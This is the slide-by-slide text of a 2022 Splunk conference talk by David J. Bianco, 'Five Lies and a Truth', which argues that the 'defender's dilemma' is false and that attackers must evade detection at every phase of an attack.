×
Copy
Open
Link
Embed
Share
Beginning
This slide
Copy link URL
Copy link URL
Copy iframe embed code
Copy iframe embed code
Copy javascript embed code
Copy javascript embed code
Share
Tweet
Share
Tweet
Slide 1
Slide 1 text
© 2022 SPLUNK INC. Five Lies and a Truth Attacking the Defender’s Dilemma David J. Bianco Staff Security Strategist SURGe by Splunk
[email protected]
@DavidJBianco
Slide 2
Slide 2 text
© 2022 SPLUNK INC. About Me He/Him Staff Security Strategist, SURGe SANS Certified Instructor Security Researcher ● The Pyramid of Pain ● Threat Intelligence ● Threat Hunting
Slide 3
Slide 3 text
© 2022 SPLUNK INC.
Slide 4
Slide 4 text
© 2022 SPLUNK INC. “Defenders have to get it right every time. Attackers only need to be right once.” – Literally everyone in security at one time or another The Defender’s Dilemma
Slide 5
Slide 5 text
© 2022 SPLUNK INC. The Defender’s Dilemma: Actively Harmful Wrong Premise Bad Decisions Wasted Resources Bad Security Outcomes Demoralized Defenders
Slide 6
Slide 6 text
© 2022 SPLUNK INC. Lie #1: Defense & Offense are Separate When you detect an adversary’s use of a particular indicator and respond to it quickly, you force them to expend effort to replace it. By imposing cost, you turn a defensive program into an offensive one! https://bit.ly/PyramidOfPain
Slide 7
Slide 7 text
© 2022 SPLUNK INC. Lie #2: Defenders Must be on Duty 24/7 Kind of true… BUT! Automation and SOAR can mitigate the worst of this asymmetry. What is each side doing between attacks? ● Attackers plan their next operation ● Defenders learn skills and improve defenses
Slide 8
Slide 8 text
© 2022 SPLUNK INC. Lie #3: Defenders Have to Play Fair There’s no such thing as cheating for the Blue Team! Attackers have needs, goals and habits. Take advantage of them. Deception technology makes it quite easy to lie and cheat at scale.
Slide 9
Slide 9 text
© 2022 SPLUNK INC. Lie #4: You Can’t Defend Against 0-Days An exploit is only a foothold. What comes after is the important bit. Look for exploits, but concentrate on behaviors! MITRE ATT&CK is a great start for cataloging behaviors.
Slide 10
Slide 10 text
© 2022 SPLUNK INC. Lie #5: Defenders Have to Get it Right Every Time Attacks are not single events. Attack lifecycle models imply structure and time. You have a lot of chances to detect the attack over its entire lifetime. Attackers have to evade your detection at every phase! Lockheed-Martin Cyber Kill Chain
Slide 11
Slide 11 text
© 2022 SPLUNK INC. Attackers have to get it right through their entire attack. Defenders only need to detect them once. The Truth: The Attacker’s Dilemma
Slide 12
Slide 12 text
© 2022 SPLUNK INC. The Attacker’s Dilemma is Beneficial Correct Premise Good Decisions Efficient Use of Resources Better Security Outcomes Engergized, Empowered Defenders
Slide 13
Slide 13 text
© 2022 SPLUNK INC. The Defender’s Dilemma Sits on a Throne of Lies Defense & Offense are Separate Defenders Must be on Duty 24/7 Defenders Have to Play Fair You Can’t Defend Against 0-Days Defenders Have to Get it Right Every Time
Slide 14
Slide 14 text
© 2022 SPLUNK INC. Five Lies and a Truth Attacking the Defender’s Dilemma David J. Bianco Staff Security Strategist SURGe by Splunk
[email protected]
@DavidJBianco